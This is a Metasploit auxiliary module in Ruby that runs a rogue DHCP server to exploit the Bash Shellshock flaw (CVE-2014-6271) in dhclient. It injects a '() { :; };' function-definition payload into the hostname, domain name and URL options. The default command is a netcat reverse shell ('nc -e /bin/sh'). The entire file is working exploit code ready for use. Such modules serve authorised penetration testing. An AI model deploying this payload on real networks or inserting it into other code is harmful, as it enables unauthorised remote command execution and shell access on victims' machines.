|
require 'msf/core'
require 'rex/proto/dhcp'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DHCPServer
def initialize
super (
'Name' => 'DHCP Client Bash Environment Variable Code Injection' ,
'Description' => %q{
This module exploits a code injection in specially crafted environment
variables in Bash, specifically targeting dhclient network configuration
scripts through the HOSTNAME , DOMAINNAME , and URL DHCP options.
},
'Author' =>
[
'scriptjunkie' , 'apconole[at]yahoo.com' ,
'Stephane Chazelas' ,
'Ramon de C Valle'
],
'License' => MSF_LICENSE ,
'Actions' =>
[
[ 'Service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service' ,
'References' => [
[ 'CVE' , '2014-6271' ],
[ 'CWE' , '94' ],
],
'DisclosureDate' => 'Sep 24 2014'
)
register_options(
[
OptString. new ( 'SRVHOST' , [ true , 'The IP of the DHCP server' ]),
OptString. new ( 'NETMASK' , [ true , 'The netmask of the local subnet' ]),
OptString. new ( 'DHCPIPSTART' , [ false , 'The first IP to give out' ]),
OptString. new ( 'DHCPIPEND' , [ false , 'The last IP to give out' ]),
OptString. new ( 'ROUTER' , [ false , 'The router IP address' ]),
OptString. new ( 'BROADCAST' , [ false , 'The broadcast address to send to' ]),
OptString. new ( 'DNSSERVER' , [ false , 'The DNS server IP address' ]),
OptString. new ( 'HOSTSTART' , [ false , 'The optional host integer counter' ]),
OptString. new ( 'FILENAME' , [ false , 'The optional filename of a tftp boot server' ]),
OptString. new ( 'CMD' , [ true , 'The command to run' , '/bin/nc -e /bin/sh 127.0.0.1 4444' ])
], self . class )
end
def run
value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
loop do
begin
start_service({
'HOSTNAME' => value,
'DOMAINNAME' => value,
'URL' => value
}.merge(datastore))
while dhcp.thread.alive?
select( nil , nil , nil , 2 )
end
rescue Interrupt
break
ensure
stop_service
end
end
end
end
|